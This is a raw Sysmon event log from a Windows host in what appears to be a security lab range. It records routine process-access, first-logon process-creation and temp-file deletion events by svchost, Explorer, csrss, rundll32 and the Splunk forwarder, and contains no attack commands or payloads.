12:02:21.914{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.914{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.914{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.914{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.914{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64CD-6064-B200-00000000AE01}1260C:\Windows\System32\unregmp2.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.914{266CAFBE-64C5-6064-A500-00000000AE01}43561176C:\Windows\Explorer.EXE{266CAFBE-64CD-6064-B200-00000000AE01}1260C:\Windows\System32\unregmp2.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+551d34|C:\Windows\System32\SHELL32.dll+551790|C:\Windows\System32\SHELL32.dll+551904|C:\Windows\System32\SHELL32.dll+22dcef|C:\Windows\System32\SHELL32.dll+f539d|C:\Windows\System32\SHELL32.dll+10d421 154100x80000000000000005794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.919{266CAFBE-64CD-6064-B200-00000000AE01}1260C:\Windows\System32\unregmp2.exe12.0.14393.4169 (rs1_release.210107-1130)Microsoft Windows Media Player Setup UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationunregmp2.exe"C:\Windows\System32\unregmp2.exe" /FirstLogonC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=0AFAF8B10C3D2B009DED280C875EA3EA,SHA256=CFC5A8170AF2CCB8F846BA738E5173596A4C35C023BCE5E6EB04E07779283188,IMPHASH=DFC94E57160B0CE8835243B5D92F3D9E{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x80000000000000005793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.805{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64CD-6064-B100-00000000AE01}2844C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.805{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64CD-6064-B100-00000000AE01}2844C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.805{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64CD-6064-B100-00000000AE01}2844C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.774{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.774{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.774{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.774{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.758{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.758{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.634{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+74a3|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.634{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1798E20E45A8E621E5BEB086D88DA95F,SHA256=E607EE13D3562C1AB5E2EA9A9818607D95FABA3E601A54A019E4624F55816172,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.634{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.634{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.135{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\Administrator\Favorites\Bing.urlMD5=5D42DDDDA9951546C9D43F0062C94D39,SHA256=E0C0A5A360482B5C5DED8FAD5706C4C66F215F527851AD87B31380EF6060696E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:22.942{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms~RF1a4f5.TMPMD5=B376B5760CEC02680D8CDB6B39DC0C53,SHA256=4EE6127DEF47B36249A09A9545D3D0159B7A69180E5F721311E149BF3BE08229,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:22.786{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms~RF1a459.TMPMD5=9DC90CD214819F93B5B21480AF2C0FF4,SHA256=955976205E43F7483B29C5D59F1C5DEB888729E24BCCAC9FB641CD60FE5B0551,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:22.739{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms~RF1a42a.TMPMD5=CE4EA1958BD7A54E6FFE7BD3A599A642,SHA256=6672E28A3AD07202118B42BBAC559D6A65AF8B3829B7AEB2F18B3EB70027DEFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:22.693{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54DA8CF51AF32EE25FD54847F40703FB,SHA256=488F5A5478A32CD820B200DF46E276DADA496632F1EC53C59D3C598C4509749A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:22.630{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms~RF1a3bd.TMPMD5=595763DFD2DAB977091A843EBCF1164F,SHA256=C7A2B95661E15C18F8407CD81FBDE33356781C26DF3C60ED914AC534D35CEF8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:22.584{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms~RF1a38e.TMPMD5=DADFF5A5756573645ADC5785A8099647,SHA256=CCF4C19E821EBC9A362A58A3B6CCC2B03674297D1777C6036A83EDF672C16A11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:22.537{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms~RF1a35f.TMPMD5=D252F6F15CAEDF365FE2BA1989DBE20F,SHA256=82FB3B41C3D72F27391B1D27B42C99932F26CF5C6E817B65AF5AAD293BC24ACB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:22.023{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64CD-6064-B200-00000000AE01}1260C:\Windows\System32\unregmp2.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:22.023{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64CD-6064-B200-00000000AE01}1260C:\Windows\System32\unregmp2.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.954{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA8DE.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.938{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA6E9.tmpMD5=3006752A2BCFEDA0F75D551EA656B2EF,SHA256=DFD64231860C732DCED3DC78627A7844A08D5D3E4CD253FD81186BAE33CC368A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.783{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.dbMD5=A7F8296CDC5152AB7651B283020EEE4F,SHA256=8A553E97AE3298F7478DF69DF7F5AB092CA144143ED387C935A84306F41DBCFF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 